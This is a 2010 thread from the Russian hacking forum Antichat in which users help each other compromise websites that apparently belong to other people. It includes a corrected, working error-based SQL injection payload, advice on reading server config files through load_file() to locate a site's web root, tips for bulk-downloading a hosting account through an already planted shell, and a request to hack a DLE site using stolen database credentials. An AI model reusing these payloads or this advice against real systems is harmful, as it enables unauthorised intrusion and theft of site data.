ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11831  
Старый 07.03.2010, 02:39
m0use
Познающий
Регистрация: 22.02.2006
Сообщений: 50
Провел на форуме:
256744

Репутация: 16
Отправить сообщение для m0use с помощью ICQ
По умолчанию

Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default
выдает след
единственная полезная запись
DocumentRoot /srv/http/
пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь
 
Ответить с цитированием

  #11832  
Старый 07.03.2010, 02:58
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514

Репутация: 3338


Отправить сообщение для Pashkela с помощью ICQ
По умолчанию

Цитата:
Сообщение от [Feldmarschall]  
После такого запроса>

выходит:
Operand should contain 1 column(s)

в чем трабла?
вот это:

Код:
id=4+or(1,1)=(select+count(0),concat((select+versi on()+from+information_schema.tables+limit+0,1),flo or(rand(0)*2))from(information_schema.tables)group +by+2)
замени на это:

Код:
id=(select+1+from+(select+count(0),concat((select+version()+from+information_schema.tables+limit+1),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)
 
Ответить с цитированием

  #11833  
Старый 07.03.2010, 03:17
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

Pashkela Cпасиба!)
все идет..
 
Ответить с цитированием

  #11834  
Старый 07.03.2010, 17:01
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от m0use  
Вообщем есть уязвимый скуль, доступен load_file() прочитал httpd.conf виртуал хост не прописан. есть ток Include /etc/apache2/sites-enabled/ пробовал прочитать /etc/apache2/sites-enabled/default пусто... попробовал /etc/apache2/sites-enabled/000-default
выдает след
единственная полезная запись
DocumentRoot /srv/http/
пробую подставлять папки и файлы куча не соответствий... вообщем не то.. и похожей директории не получается отыскать... может есть еще варианты узнать реальный путь

Цитата:
/etc/apache2/sites-enabled/domen.com
где domen.com - сайт, где у тя скуля.

Так пробовал?
 
Ответить с цитированием

  #11835  
Старый 07.03.2010, 17:23
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =).
платформа Linux.
Можно ли создать фтп пользователя через консоль? если да то как ето сделать?
Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!
 
Ответить с цитированием

  #11836  
Старый 07.03.2010, 17:27
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от FAQ666  
Есть шелл, могу просматривать весь хостинг, по одному файлу много не выкачаю =).
платформа Linux.
Можно ли создать фтп пользователя через консоль? если да то как ето сделать?
Есть ли другие варианты всее от туда стянуть? Bind port to и архивация не подходят!
Зачем тебе FTP? Архивируй через tar и скачивай через шелл.
 
Ответить с цитированием

  #11837  
Старый 07.03.2010, 17:31
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Цитата:
Сообщение от mailbrush  
Зачем тебе FTP? Архивируй через tar и скачивай через шелл.
Архивация не подходит! если больше двух метров архив то ошибка! да и свободного места там практические нет.
 
Ответить с цитированием

  #11838  
Старый 07.03.2010, 18:27
Quicky
Новичок
Регистрация: 27.09.2007
Сообщений: 10
Провел на форуме:
33287

Репутация: 0
По умолчанию

Вобще прощу помощи есть база данных от сайта, типа db_user, db_pass, db_host ну и т.д., Движок ДЛЕ, но шелла нет ( Подскажите можно ли как то взломать?
 
Ответить с цитированием

  #11839  
Старый 07.03.2010, 19:34
[Feldmarschall]
Участник форума
Регистрация: 06.01.2010
Сообщений: 136
Провел на форуме:
568388

Репутация: 87
По умолчанию

что взломать?
 
Ответить с цитированием

  #11840  
Старый 07.03.2010, 20:46
scorpic393
Banned
Регистрация: 05.02.2010
Сообщений: 70
Провел на форуме:
177258

Репутация: 5
По умолчанию

Подскажите плиз, точнее напишите мне пожалуйста самый примитивный скрипт с blind sql-inj. Я чёто начал писать, но ошибка выводиться токо при подстановки ковычек. помогит плиз
PHP код:
<?php
...
if(isset(
$_GET['type']))
{
    
$response=mysql_query("SELECT * FROM news WHERE type='".$_GET['type']."'");
    
$result=mysql_fetch_array($response);
}
...
?>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ